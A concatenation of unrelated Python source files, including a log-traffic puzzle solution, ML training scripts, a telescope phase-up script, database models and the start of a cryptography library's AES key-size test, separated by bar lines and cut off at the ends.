    for i, window_start in enumerate(ends):
        overlapping = sum(
            1 for j in range(i, len(lines))
            if window_start > starts[j] - 1000
        )
        best = max(best, overlapping)
    return best
def get_time(time):
    """Convert an 'hh:mm:ss.mmm' timestamp string into total milliseconds."""
    whole_seconds = (
        int(time[:2]) * 3600   # hours
        + int(time[3:5]) * 60  # minutes
        + int(time[6:8])       # seconds
    )
    return whole_seconds * 1000 + int(time[9:])  # plus milliseconds
def get_start_time(time, duration_time):
    """Return the start time in ms of a request, given end time and duration.

    *time* is the 'hh:mm:ss.mmm' completion timestamp; *duration_time* is a
    string like '2.31s'.  The start is inclusive, hence the trailing +1.
    """
    seconds = duration_time[:-1]  # strip the trailing 's'
    # round() before int() guards against binary float representation error:
    # a duration whose float value lands fractionally below the true
    # millisecond count would otherwise be truncated, shifting the start
    # time by one millisecond.
    duration_ms = int(round(float(seconds) * 1000))
    return get_time(time) - duration_ms + 1
if __name__ == "__main__":
    # Sample input from the Kakao "Chuseok traffic" problem; expected answer: 7.
    # (Removed a leftover debug assignment that split the first line but was
    # never used.)
    lines = [
        "2016-09-15 20:59:57.421 0.351s",
        "2016-09-15 20:59:58.233 1.181s",
        "2016-09-15 20:59:58.299 0.8s",
        "2016-09-15 20:59:58.688 1.041s",
        "2016-09-15 20:59:59.591 1.412s",
        "2016-09-15 21:00:00.464 1.466s",
        "2016-09-15 21:00:00.741 1.581s",
        "2016-09-15 21:00:00.748 2.31s",
        "2016-09-15 21:00:00.966 0.381s",
        "2016-09-15 21:00:02.066 2.62s"
    ]
    print(solution(lines))
|
import unittest
import os
from polyglot.model import LanguageModel
from polyglot.classifier import Classifier
import cStringIO
from time import time
import logging
logging.basicConfig(format='%(asctime)s -- %(message)s', level=logging.INFO)
class TestShit(unittest.TestCase):
    # Classifier configuration: character n-gram order and location of the
    # training corpus (one subdirectory per language).  The model is kept in
    # an in-memory buffer rather than on disk.  (Python 2 code: print
    # statements, cStringIO.)
    ngram = 3
    corpus_dir = './corpus'
    model_fp = cStringIO.StringIO()
    # model_fp = open('../model.json')

    def test_corpus(self):
        # Train the classifier on the corpus, then check that every training
        # file is classified back to the language it came from.
        print 'Training',
        db = LanguageModel(self.model_fp)
        god = Classifier(db, self.ngram)
        god.train(self.corpus_dir)
        print 'done'

        # First os.walk yield gives the top-level language directories.
        _, langs, _ = os.walk(self.corpus_dir).next()
        for lang in filter(lambda l: not l.startswith('.'), langs):
            file_paths = []
            for root, _, files in os.walk(os.path.join(self.corpus_dir, lang)):
                file_paths.extend(map(lambda fn: os.path.join(root, fn), files))
            for fpath in file_paths:
                print fpath,
                ts = time()
                # The top-ranked classification must match the directory name.
                self.assertEqual(god.classify(open(fpath).read())[0][0], lang)
                print 'passed, took: %2.4f sec' % (time()-ts)
if __name__ == '__main__':
unittest.main()
|
# https://github.com/godbmw/various-codes/tree/master/DictEmotionAlgorithm
# https://github.com/AimeeLee77/senti_analysis/tree/master/data/ChnSentiCorp_htl_ba_2000
# https://github.com/godbmw/news-emotion/tree/master/data/trainset
import os
import io
DIR = os.path.join(os.path.dirname(__file__), "../unprepared_test_data")
def get_files(input_dir):
    """Recursively collect paths of all .txt files under *input_dir*."""
    collected = []
    for dirpath, dirnames, filenames in os.walk(input_dir):
        collected.extend(
            os.path.join(dirpath, name)
            for name in filenames
            if name.endswith(".txt")
        )
    return collected
def predict_encoding(file_path, n_lines=20):
    '''Predict a file's encoding using chardet'''
    import chardet

    # Sample up to n_lines of raw bytes and let chardet guess the charset.
    with open(file_path, 'rb') as source:
        sample = b''.join(source.readline() for _ in range(n_lines))
    return chardet.detect(sample)['encoding']
def loop_files(input_dir, output):
    """Convert raw sentiment files into one tab-separated labelled file.

    Each .txt file under *input_dir* whose basename starts with 'neg' or
    'pos' is read (encoding guessed via chardet, falling back to gb2312)
    and appended to *output* as '<content>\\t<n|p>\\n'.  Files with other
    basenames, or that fail to decode, are skipped.
    """
    files = get_files(input_dir)
    # Renamed locals: the original shadowed the 'output' parameter with the
    # output file handle, and the builtin 'file' with the loop variable.
    with open(output, "w") as out_fp:
        for path in files:
            encoding = predict_encoding(path)
            print(path, encoding)
            basename = os.path.basename(path)
            if basename.startswith("neg"):
                mark = "n"
            elif basename.startswith("pos"):
                mark = "p"
            else:
                # Unlabelled file: not part of the dataset.
                continue
            if not encoding:
                # chardet could not decide; assume simplified Chinese.
                encoding = "gb2312"
            try:
                with io.open(path, encoding=encoding) as f:
                    content = f.read().strip().replace("\n", "")
                    out_fp.write(content + "\t" + mark + "\n")
            except Exception:
                # Undecodable file: skip it rather than abort the batch.
                continue
# Convert each raw dataset into its labelled test-data file.  The output
# file name mirrors the dataset directory name, so the three previously
# duplicated call blocks collapse into one loop (same calls, same order).
for _dataset in ("DictEmotionAlgorithm", "ChnSentiCorp_htl_ba_2000", "trainset"):
    input_dir = os.path.join(DIR, _dataset)
    output = os.path.join(DIR, "../test_data/%s.txt" % _dataset)
    loop_files(input_dir, output)
|
from .p141_assigned import P141Assigned
from dataclasses import dataclass
@dataclass
class P35HasIdentified(P141Assigned):
    """
    Scope note:
    This property identifies the E3 Condition State that was observed in an E14 Condition Assessment activity.

    Examples:
    - 1997 condition assessment of silver cup 232 (E14) has identified oxidation traces were present in 1997 (E3) has type oxidation traces (E55)

    In First Order Logic:
    P35(x,y) ⊃ E14(x)
    P35(x,y) ⊃ E3(y)
    P35(x,y) ⊃ P141(x,y)
    """

    # Canonical Erlangen CRM URI for the P35 'has identified' property.
    URI = "http://erlangen-crm.org/current/P35_has_identified"
|
import numpy as np
from quadruped_spring.env.tasks.task_base import TaskJumping
class JumpingOnPlaceHeight(TaskJumping):
    """
    Single in-place jump task.  The robot should land as close as possible
    to where it took off; the sparse reward maximizes the reached height.
    """

    def __init__(self):
        super().__init__()

    def _reward(self):
        """Sparse reward: zero everywhere except the end of the episode."""
        return 0

    def _reward_end_episode(self):
        """Compute bonus and malus added to the reward at episode end."""
        max_height = 0.8
        # Normalized height, clamped into [0, 1].
        height_score = min(self._relative_max_height / max_height, 1.0)

        total = 0.8 * height_score
        total += height_score * 0.03 * np.exp(-self._max_yaw**2 / 0.01)  # orientation
        total += height_score * 0.03 * np.exp(-self._max_roll**2 / 0.01)  # orientation
        total += height_score * 0.05 * np.exp(-self._max_forward_distance**2 / 0.05)  # be on place
        total += height_score * 0.08 * np.exp(-self._max_vel_err**2 / 0.001)  # vel direction is similar to [0,0,1]

        if self._terminated():
            # Malus for crashing (optionally: no reward at all on crash).
            total -= 0.08
        else:
            # Alive bonus proportional to the risk taken.
            total += 0.1 * height_score
        return total

    def _reset(self, env):
        super()._reset(env)
        landing_pose = self._env._robot_config.INIT_MOTOR_ANGLES
        self._env._ac_interface.set_landing_pose(landing_pose)
class JumpingForward(TaskJumping):
    """
    Forward jump task.  The sparse reward maximizes the maximum flight time
    and the forward distance, with a bonus for keeping the right orientation
    and a malus for crashing.
    """

    def __init__(self):
        super().__init__()

    def _reward(self):
        """Sparse reward: zero everywhere except the end of the episode."""
        return 0

    def _reward_end_episode(self):
        """Compute bonus and malus added to the reward at episode end."""
        crashed = self._terminated()
        # Malus for crashing (optionally: no reward at all on crash).
        total = -0.08 if crashed else 0

        max_distance = 0.2
        distance_score = self._max_forward_distance / max_distance
        flight = self._max_flight_time

        total += flight
        total += 0.1 * distance_score
        total += flight * 0.05 * np.exp(-self._max_yaw**2 / 0.01)  # orientation
        total += flight * 0.05 * np.exp(-self._max_roll**2 / 0.01)  # orientation
        if flight > 0 and not crashed:
            # Alive bonus proportional to the risk taken.
            total += 0.1 * flight
        # print(f"Forward dist: {self._max_forward_distance}")
        return total
|
#!/usr/bin/python
# Track target(s) for a specified time.
# Also set the data gains before and after the track
# The *with* keyword is standard in Python 2.6, but has to be explicitly imported in Python 2.5
from __future__ import with_statement
import time
from katcorelib.observe import standard_script_options, verify_and_connect, collect_targets, user_logger,start_session
#from katcorelib import ant_array,standard_script_options, verify_and_connect, collect_targets, start_session, user_logger
import katpoint
import pickle
import numpy as np
import StringIO
import logging
#import fbf_katcp_wrapper as fbf
# read the bandpass solutions from a pickle file
# read the bandpass solutions from a pickle file
# NOTE(review): the file handle passed to pickle.load is never closed, and
# raw_data is not referenced again below; bpass_h/bpass_v appear to map
# antenna name -> per-channel bandpass gains per polarisation — confirm.
raw_data,bpass_h,bpass_v=pickle.load(open('/home/kat/comm/scripts/bpass.pikl'))

# Set up standard script options
parser = standard_script_options(usage="%prog [options] <'target/catalogue'> [<'target/catalogue'> ...]",
                                 description='Track one or more sources for a specified time. At least one '
                                             'target must be specified. Note also some **required** options below.')
# Add experiment-specific options
#parser.add_option('--project-id',
#                  help='Project ID code the observation (**required**) This is a required option')
parser.add_option('-t', '--track-duration', type='float', default=60.0,
                  help='Length of time to track each source, in seconds (default=%default)')
parser.add_option('-m', '--max-duration', type='float', default=None,
                  help='Maximum duration of the script in seconds, after which script will end '
                       'as soon as the current track finishes (no limit by default)')
parser.add_option('--repeat', action="store_true", default=False,
                  help='Repeatedly loop through the targets until maximum duration (which must be set for this)')
parser.add_option('--reset', action="store_true", default=False,
                  help='Reset the gains to 160.')
parser.add_option('--half-band', action='store_true', default=True,
                  help='Use only inner 50% of output band')
parser.add_option('--transpose', action='store_true', default=False,
                  help='Transpose time frequency blocks from correlator')
# Set default value for any option (both standard and experiment-specific options)
parser.set_defaults(observer='comm_test',nd_params='off',project_id='COMMTEST',description='Phaseup observation setting f-engine weights',dump_rate=1.0)
# Parse the command line
opts, args = parser.parse_args()
# Check options and build KAT configuration, connecting to proxies and devices
# Check options and build KAT configuration, connecting to proxies and devices
with verify_and_connect(opts) as kat:
    ants = kat.ants
    obs_ants = [ant.name for ant in ants]
    observation_sources = collect_targets(kat,args)
    # Find out what inputs are curremtly active
    reply = kat.data.req.dbe_label_input()
    inputs = [m.arguments[0] for m in reply.messages[3:]]
    # Start from flat unity-phase gains so the phase solution below is clean.
    user_logger.info("Resetting f-engine gains to 160 to allow phasing up")
    for inp in inputs:
        kat.data.req.dbe_k7_gain(inp,160)
    # Quit early if there are no sources to observe
    if len(observation_sources.filter(el_limit_deg=opts.horizon)) == 0:
        user_logger.warning("No targets are currently visible - please re-run the script later")
    else:
        # Start capture session, which creates HDF5 file
        with start_session(kat, **vars(opts)) as session:
            session.standard_setup(**vars(opts))
            session.capture_start()
            start_time = time.time()
            targets_observed = []
            # Keep going until the time is up
            keep_going = True
            while keep_going:
                for target in observation_sources.iterfilter(el_limit_deg=opts.horizon):
                    # A flux model is required for calibration; bail out if missing.
                    if target.flux_model is None:
                        user_logger.warning("Target has no flux model - stopping script")
                        keep_going=False
                        break
                    # observe the target for 60 seconds to determine the
                    # antenna gains
                    target.add_tags('bpcal')
                    session.label('track')
                    user_logger.info("Initiating %g-second track on target '%s'" % (60,target.name,))
                    session.track(target, duration=60, announce=False)
                    # Allow gain-correction sensors to update before reading them.
                    time.sleep(5)
                    # get and set the weights
                    for inp in inputs:
                        # Skip inputs whose antenna is not part of this observation.
                        if inp[:-1] not in obs_ants : continue
                        # Input names are '<antenna><pol>', e.g. 'ant1v'.
                        pol = inp[-1]
                        if pol == 'v':
                            gains = bpass_v[inp[:-1]]
                        else:
                            gains = bpass_h[inp[:-1]]
                        gains = np.hstack((np.zeros(1),gains))
                        weights = getattr(kat.data.sensor,'k7w_'+inp+'_gain_correction_per_channel').get_reading().value
                        # added print statement - weigths empty?
                        update = getattr(kat.data.sensor,'k7w_'+inp+'_gain_correction_per_channel').get_reading().timestamp
                        user_logger.info("Gain sensors updated at %s"%katpoint.Timestamp(update).local())
                        # Sensor value is a space-separated complex vector; parse it.
                        f = StringIO.StringIO(weights)
                        orig_weights = np.loadtxt(f, dtype=np.complex,delimiter=' ')
                        amp_weights = np.abs(orig_weights)
                        phase_weights = orig_weights / amp_weights
                        # Channel mask: only the inner band is phased up.
                        ind = np.repeat(False,1024)
                        # here is where you hack things to get "fuller" band
                        #ind[slice(10,1000)]=True # this will not work! but do not have time to repair that
                        ind[slice(200,800)]=True
                        gains[~ind] = 160.0
                        # Fit a straight line to the unwrapped phase across the band
                        # (i.e. a delay term) instead of using the raw noisy phases.
                        N = phase_weights[ind].shape[0]
                        z = np.polyfit(np.arange(N),np.unwrap(np.angle(phase_weights)[ind]),1)
                        #print z
                        phase = np.zeros(1024)
                        #phase[ind] = np.angle(phase_weights[ind])
                        phase[ind] = z[0]*np.arange(N)+z[1]
                        new_weights = (160.0 / gains ) * np.exp(1j * phase)
                        weights_str = ' '.join([('%+5.3f%+5.3fj' % (w.real,w.imag)) for w in new_weights])
                        kat.data.req.dbe_k7_gain(inp,weights_str)
                        #because we are phasing in the f-engine set the b-engine weights to 1
                        bf_weights_str = ' '.join(1024 * ['1'])
                        if pol == 'v':
                            kat.data.req.dbe_k7_beam_weights('bf1',inp,bf_weights_str)
                        else:
                            kat.data.req.dbe_k7_beam_weights('bf0',inp,bf_weights_str)
                    # Verification track with the new weights applied.
                    user_logger.info("Initiating %g-second track on target '%s'" % (60,target.name,))
                    session.track(target, duration=60, announce=False)
                keep_going = False
    if opts.reset:
        user_logger.info("Resetting f-engine gains to 160")
        for inp in inputs:
            kat.data.req.dbe_k7_gain(inp,160)
|
# Resolved an unresolved git merge conflict that was committed verbatim
# (<<<<<<< / ======= / >>>>>>> markers), which made this module a
# SyntaxError on import.  HEAD added nothing; the incoming branch added
# Smooth, GetComplex and MatrixUnwrap, so both sides are kept.
from . import Globals
from .ReadMatrix import ReadMatrix
from .ReadComplexMatrix import ReadComplexMatrix
from .PlotMatrix import PlotMatrix
from .PlotMatrix3D import PlotMatrix3D
from .MatrixVariation import MatrixVariation
from . import Unwrapping
from . import Smooth
from .GetComplex import GetComplex
from .MatrixUnwrap import MatrixUnwrap
|
from .packet_endpoints import (
Packet_EP,
Packet_Table_EP,
Packet_Table_Counts_EP,
Packet_Table_Views_EP,
)
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Common command-line arguments for filtering Isovar results
"""
from __future__ import print_function, division, absolute_import
from collections import OrderedDict
from ..default_parameters import (
MIN_NUM_RNA_ALT_FRAGMENTS,
MIN_NUM_RNA_ALT_READS,
MIN_FRACTION_RNA_ALT_FRAGMENTS,
MIN_RATIO_RNA_ALT_TO_OTHER_FRAGMENTS
)
def add_filter_args(parser):
    """
    Attach the variant / protein-sequence filtering options to *parser*
    under a dedicated "Filtering" argument group.

    Returns the argument group so callers can extend it further.
    """
    group = parser.add_argument_group("Filtering")
    group.add_argument(
        "--min-alt-rna-reads",
        default=MIN_NUM_RNA_ALT_READS,
        type=int,
        help="Minimum number of reads supporting variant allele (default %(default)s)")
    group.add_argument(
        "--min-alt-rna-fragments",
        default=MIN_NUM_RNA_ALT_FRAGMENTS,
        type=int,
        help=(
            "Minimum number of fragments supporting variant allele (default %(default)s). "
            "Note that this option is the same as --min-alt-rna-reads for single-end "
            "sequencing."))
    group.add_argument(
        "--min-alt-rna-fraction",
        default=MIN_FRACTION_RNA_ALT_FRAGMENTS,
        type=float,
        help=(
            "Minimum ratio of fragments supporting variant allele to total RNA fragments "
            "(default %(default)s)."))
    group.add_argument(
        "--min-ratio-alt-to-other-fragments",
        default=MIN_RATIO_RNA_ALT_TO_OTHER_FRAGMENTS,
        type=float,
        help=(
            "At loci where alleles other than the ref and a single alt are supported, "
            "this parameter controls how many more times fragments supporting "
            "the variant allele are required relative to other non-reference "
            "alleles (default %(default)s)."))
    return group
def filter_threshold_dict_from_args(args):
    """
    Map the external CLI filter options onto the internal
    {min|max}_{Isovar property} naming scheme.

    Returns OrderedDict
    """
    return OrderedDict([
        ("min_ratio_alt_to_other_fragments", args.min_ratio_alt_to_other_fragments),
        ("min_fraction_alt_fragments", args.min_alt_rna_fraction),
        ("min_num_alt_fragments", args.min_alt_rna_fragments),
        ("min_num_alt_reads", args.min_alt_rna_reads),
    ])
|
from sqlalchemy import Column, Integer, String, ForeignKey
from app.models.base import Base, db
from app.models.contest import Contest
from app.models.problem import Problem
class ProblemContestRel(Base):
    """Association row linking a problem to a contest, carrying the
    display id the problem uses inside that contest."""
    __tablename__ = 'problem_contest_rel'

    id = Column(Integer, primary_key=True, autoincrement=True)
    problem_id = Column(Integer, ForeignKey(Problem.id))
    contest_id = Column(Integer, ForeignKey(Contest.id))
    problem_id_in_contest = Column(String(100))

    @property
    def problem(self):
        """The linked Problem, with its id remapped to the in-contest id."""
        prob = Problem.get_by_id(self.problem_id)
        prob.problem_id = self.problem_id_in_contest
        prob.show('problem_id')
        return prob

    @classmethod
    def get_by_problem_id_and_contest_id(cls, contest_id, problem_id):
        """First relation matching (contest_id, problem_id), or None."""
        matches = cls.search(contest_id=contest_id, problem_id=problem_id)['data']
        return matches[0] if matches else None

    @classmethod
    def get_by_problem_id_in_contest(cls, contest_id, id_in_contest):
        """First relation matching the contest-local problem id, or None."""
        matches = cls.search(
            contest_id=contest_id, problem_id_in_contest=id_in_contest)['data']
        return matches[0] if matches else None

    @staticmethod
    def get_problems_by_contest_id(contest_id):
        """All problems of a contest, ordered by their in-contest id."""
        from sqlalchemy import asc
        rows = db.session.query(Problem, ProblemContestRel.problem_id_in_contest). \
            filter(Problem.id == ProblemContestRel.problem_id). \
            filter(ProblemContestRel.contest_id == contest_id). \
            order_by(asc(ProblemContestRel.problem_id_in_contest)).all()
        remapped = []
        for prob, in_contest_id in rows:
            prob.problem_id = in_contest_id
            prob.show('problem_id')
            remapped.append(prob)
        return remapped

    @staticmethod
    def delete_contest(contest_id):
        """Remove every problem/contest relation for the given contest."""
        db.session.query(ProblemContestRel). \
            filter(ProblemContestRel.contest_id == contest_id). \
            delete()
|
from matplotlib import rcParams
import numpy as np
# eternally grateful to http://blog.dmcdougall.co.uk/publication-ready-the-first-time-beautiful-reproducible-plots-with-matplotlib/
def default():
    """Set publication-quality matplotlib rcParams and return them.

    All font sizes are scaled from a single ``reference`` size; the figure
    dimensions are derived from the LaTeX text width so figures drop into
    the document at their natural size.
    """
    reference = 16
    rcParams['axes.titlesize'] = 1 * reference
    rcParams['axes.labelsize'] = 1 * reference
    rcParams['xtick.labelsize'] = 0.8 * reference
    rcParams['ytick.labelsize'] = 0.8 * reference
    rcParams['legend.fontsize'] = 0.8 * reference
    rcParams['axes.linewidth'] = .5
    rcParams['lines.linewidth'] = .5
    rcParams['patch.linewidth'] = .5
    rcParams['font.family'] = 'sans-serif'
    # Bug fix: the family above is 'sans-serif', so the font list belongs in
    # 'font.sans-serif'. The original set 'font.serif', which is ignored when
    # the family is sans-serif (DejaVu Sans is a sans-serif face anyway).
    rcParams['font.sans-serif'] = ['DejaVu Sans']
    rcParams['text.usetex'] = True
    WIDTH = 489.38739  # the number latex spits out (\the\textwidth, in pt)
    # FACTOR = 0.49 # the fraction of the width you'd like the figure to occupy
    FACTOR = 1.0
    fig_width_pt = WIDTH * FACTOR
    inches_per_pt = 1.0 / 72.27  # TeX points per inch
    golden_ratio = (np.sqrt(5) - 1.0) / 2.0  # because it looks good
    fig_width_in = fig_width_pt * inches_per_pt  # figure width in inches
    fig_height_in = fig_width_in * golden_ratio  # figure height in inches
    fig_dims = [fig_width_in, fig_height_in]  # fig dims as a list
    rcParams['figure.figsize'] = fig_dims
    return rcParams
|
import tensorflow as tf
import tensorflow_addons as tfa
from vit_keras import vit, utils, visualize
from dataset import COVIDxCTDataset
from math import ceil
import os
import numpy as np
import pickle
import matplotlib.pyplot as plt
# Run-mode flag (NOTE(review): not referenced in the visible code — confirm use).
Training = True

# Dataset locations; the training split uses a class-resampled label file.
DATA_DIR = '../2A_images/'
# TRAIN_LABEL_FILE = '../train_COVIDx_CT-2A.txt'
TRAIN_LABEL_FILE = './resampled_train_COVIDx_CT-2A.txt'
VAL_LABEL_FILE = '../val_COVIDx_CT-2A.txt'
TEST_LABEL_FILE = '../test_COVIDx_CT-2A.txt'

# Model / input geometry. Images are loaded at INPUT_* and cropped/resized
# to IMAGE_SIZE for the ViT (patch size 16 => 14x14 patches at 224x224).
BATCH_SIZE = 64
IMAGE_SIZE = (224, 224)
PATCH_SIZE = 16
NUM_EPOCHS = 20
INPUT_HEIGHT = 512
INPUT_WIDTH = 512

# Data-augmentation ranges passed to COVIDxCTDataset.
MAX_BBOX_JITTER = 0.075
MAX_ROTATION = 15
MAX_SHEAR = 0.2
MAX_PIXEL_SHIFT = 15
MAX_PIXEL_SCALE_CHANGE = 0.15

# Label order matches the integer class ids in the label files.
CLASS_NAMES = ['Normal', 'Pneumonia', 'COVID-19']
N_CLASS = len(CLASS_NAMES)
CLASS_DICT = {0: 'Normal', 1: 'Pneumonia', 2: 'COVID-19'}

dataset = COVIDxCTDataset(
    DATA_DIR,
    image_height=INPUT_HEIGHT,
    image_width=INPUT_WIDTH,
    target_height=IMAGE_SIZE[0],
    target_width=IMAGE_SIZE[1],
    max_bbox_jitter=MAX_BBOX_JITTER,
    max_rotation=MAX_ROTATION,
    max_shear=MAX_SHEAR,
    max_pixel_shift=MAX_PIXEL_SHIFT,
    max_pixel_scale_change=MAX_PIXEL_SCALE_CHANGE
)
# Each split returns (tf.data pipeline, number of images, effective batch size).
tr_dataset, tr_num_images, tr_batch_size = dataset.train_dataset(TRAIN_LABEL_FILE, BATCH_SIZE)
tr_iter_per_epoch = ceil(tr_num_images / tr_batch_size)
val_dataset, val_num_images, val_batch_size = dataset.validation_dataset(VAL_LABEL_FILE, BATCH_SIZE)
val_iter_per_epoch = ceil(val_num_images / val_batch_size)
# Test split reuses the (non-augmenting) validation pipeline.
test_dataset, test_num_images, test_batch_size = dataset.validation_dataset(TEST_LABEL_FILE, BATCH_SIZE)
test_iter_per_epoch = ceil(test_num_images / test_batch_size)

# Pretrained ViT-B/16 backbone without its classification head; a small
# dropout + dense head is attached for the 3-class problem.
base_model = vit.vit_b16(
    image_size=IMAGE_SIZE[0],
    activation='softmax',
    pretrained=True,
    include_top=False,
    pretrained_top=False
)
base_model.summary()
x = base_model.output
x = tf.keras.layers.Dropout(0.5)(x)
x = tf.keras.layers.Dense(256, activation='relu')(x)
y = tf.keras.layers.Dense(N_CLASS, activation='softmax')(x)
model = tf.keras.Model(base_model.input, y)
model.summary()

# Adam with a cosine-decayed learning rate.
optimizer = tf.keras.optimizers.Adam(
    learning_rate=tf.keras.experimental.CosineDecay(
        initial_learning_rate=1e-4, decay_steps=5000))
# Streaming metrics, reset periodically by the training loop.
train_loss = tf.keras.metrics.Mean(name='train_loss')
train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='train_acc')
val_loss = tf.keras.metrics.Mean(name='val_loss')
val_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='val_acc')
@tf.function
def train_step(data):
    """Run one optimization step on a batch dict with 'image' and 'label'.

    Updates the model weights and accumulates the streaming train_loss /
    train_accuracy metrics.
    """
    with tf.GradientTape() as tape:
        inp = data['image']
        y_true = data['label']
        # Bug fix: pass training=True so the Dropout(0.5) layer in the head is
        # active during training; the original model(inp) call left the model
        # in inference mode, silently disabling dropout.
        y_pred = model(inp, training=True)
        loss = tf.keras.losses.SparseCategoricalCrossentropy()(y_true, y_pred)
    gradients = tape.gradient(loss, model.trainable_variables)
    optimizer.apply_gradients(zip(gradients, model.trainable_variables))
    train_loss(loss)
    train_accuracy(y_true, y_pred)
@tf.function
def val_step(data):
    """Accumulate validation loss/accuracy for one batch (inference mode)."""
    images = data['image']
    labels = data['label']
    predictions = model(images, training=False)
    batch_loss = tf.keras.losses.SparseCategoricalCrossentropy()(labels, predictions)
    val_loss(batch_loss)
    val_accuracy(labels, predictions)
@tf.function
def predict_step(data):
    """Forward pass in inference mode; returns (true labels, predictions)."""
    images = data['image']
    labels = data['label']
    predictions = model(images, training=False)
    return labels, predictions
# Output locations for checkpoints and evaluation artifacts.
ckpt_path = './ViT/checkpoint/'
result_path = './ViT/results/'
BEST_VAL_LOSS = 999999  # NOTE(review): tracked but never updated below
BEST_VAL_ACC = 0
# Patience counter for the (currently disabled) LR-decay logic.
current_patience = patience = 3
# Idiom: exist_ok replaces the explicit exists()/makedirs() dance.
os.makedirs(ckpt_path, exist_ok=True)
os.makedirs(result_path, exist_ok=True)

tr_data_iter = iter(tr_dataset)
for step in range(NUM_EPOCHS * tr_iter_per_epoch):
    tr_data = next(tr_data_iter)
    train_step(tr_data)
    if step % 100 == 0:
        # Periodic full validation pass.
        for idx, data in enumerate(val_dataset):
            val_step(data)
        print(
            f'\nStep {step + 1}, '
            f'Loss: {train_loss.result().numpy()}, '
            f'Accuracy: {train_accuracy.result().numpy() * 100}, '
            f'Val Loss: {val_loss.result().numpy()}, '
            f'Val Accuracy: {val_accuracy.result().numpy() * 100}\n'
        )
        print(f'\n LR: {tf.keras.backend.get_value(optimizer.learning_rate)}\n')
        # Keep only the weights with the best validation accuracy so far.
        if BEST_VAL_ACC < val_accuracy.result().numpy():
            print('Improved')
            BEST_VAL_ACC = val_accuracy.result().numpy()
            model.save_weights(f'{ckpt_path}covid_vit.h5')
            current_patience = patience
        else:
            current_patience -= 1
            if current_patience == 0:
                # LR halving is intentionally disabled; only reset patience.
                # tf.keras.backend.set_value(optimizer.learning_rate,
                #     max(tf.keras.backend.get_value(optimizer.learning_rate) * 0.5, 1e-7))
                # print(f'\n LR: {tf.keras.backend.get_value(optimizer.learning_rate)}\n')
                current_patience = patience
        # Metrics accumulate per evaluation window.
        train_loss.reset_states()
        train_accuracy.reset_states()
        val_loss.reset_states()
        val_accuracy.reset_states()

# Sanity-check grid of 9 images from the last training batch.
# NOTE(review): indentation was ambiguous in the original; placed after the
# training loop so it runs once -- confirm intent.
plt.close('all')
fig, axes = plt.subplots(3, 3, figsize=(16, 16))
indices = np.random.choice(list(range(BATCH_SIZE)), 9)
for index, ax in zip(indices, axes.ravel()):
    image = tr_data['image'].numpy()[index]
    # Display
    cls = tr_data['label'].numpy()[index]
    ax.imshow(image)
    ax.set_title('Class: {} ({})'.format(CLASS_NAMES[cls], cls))
plt.savefig(f'{result_path}test_img_{step}.png')

# Evaluate the best checkpoint on the held-out test split.
model.load_weights(f'{ckpt_path}covid_vit.h5')
y_pred_test = []
test_labels = []
for idx, data in enumerate(test_dataset):
    test_y, pred_y = predict_step(data)
    y_pred_test.append(pred_y.numpy())
    test_labels.append(test_y.numpy())
# Bug fix: the original concatenated twice; the second np.concatenate ran on
# already-stacked ndarrays and mangled their shapes before pickling.
y_pred_test = np.concatenate(y_pred_test, axis=0)
test_labels = np.concatenate(test_labels, axis=0)
prediction_dict = dict()
prediction_dict['test_y_pred'] = y_pred_test
prediction_dict['test_y_pred_cat'] = np.argmax(y_pred_test, axis=1)
prediction_dict['test_y'] = test_labels
with open(f'{result_path}pred_true.pkl', 'wb') as f:
    pickle.dump(prediction_dict, f)
|
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
from models.model_utils import ConvBlock, _ResNet, _ResnetBasicBlock
class BaseEncoder(nn.Module):
    """Common base for encoders: records the channel/downsampling
    configuration so downstream components can query it."""

    def __init__(
        self,
        n_input_channels: int = 1,
        n_output_channels: int = 512,
        p_dropout: float = 0.0,
        time_downsample_ratio: int = 16,
        **kwargs
    ):
        super().__init__()
        # Stored verbatim; subclasses decide how these are realized.
        self.n_input_channels = n_input_channels
        self.n_output_channels = n_output_channels
        self.p_dropout = p_dropout
        self.time_downsample_ratio = time_downsample_ratio
class PannResNet22(BaseEncoder):
    """
    Encoder derived from the PANN ResNet22 network: one conv block followed
    by a ResNet trunk of 4 basic blocks (layers=[2, 2, 2, 2]).
    """

    def __init__(self, n_input_channels: int = 1, p_dropout: float = 0.0, **kwargs):
        """
        :param n_input_channels: Number of input channels.
        :param p_dropout: Dropout probability.
        """
        super().__init__(
            n_input_channels=n_input_channels,
            n_output_channels=512,
            p_dropout=p_dropout,
            time_downsample_ratio=16,
        )
        self.conv_block1 = ConvBlock(in_channels=n_input_channels, out_channels=64)
        self.resnet = _ResNet(
            block=_ResnetBasicBlock, layers=[2, 2, 2, 2], zero_init_residual=True)

    def forward(self, x):
        """x: (batch_size, n_channels, n_timesteps, n_features)."""
        out = self.conv_block1(x, pool_size=(2, 2), pool_type="avg")
        out = F.dropout(out, p=self.p_dropout, training=self.training, inplace=True)
        return self.resnet(out)
if __name__ == "__main__":
    # Quick smoke test: build the encoder and push one random batch through.
    encoder = PannResNet22(n_input_channels=7)
    n_trainable = sum(p.numel() for p in encoder.parameters() if p.requires_grad)
    print("number of trainable params: {}".format(n_trainable))
    x = torch.rand((16, 7, 320, 128))
    y = encoder.forward(x)
    print(y.shape)
    print('time downsample ratio: {}'.format(320 / y.shape[2]))
    print('freq downsample ratio: {}'.format(128 / y.shape[3]))
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import binascii
import pytest
from cryptography.exceptions import _Reasons
from cryptography.hazmat.primitives import ciphers
from cryptography.hazmat.primitives.ciphers.algorithms import (
AES, ARC4, Blowfish, CAST5, Camellia, IDEA, SEED, TripleDES
)
from cryptography.hazmat.primitives.ciphers.modes import ECB
from ...utils import raises_unsupported_algorithm
class TestAES(object):
    """AES algorithm object: key_size reporting and key-length validation."""

    @pytest.mark.parametrize(("key", "keysize"), [
        (b"0" * 32, 128),
        (b"0" * 48, 192),
        (b"0" * 64, 256),
    ])
    def test_key_size(self, key, keysize):
        # Keys are hex-encoded, so the byte length is half the string length.
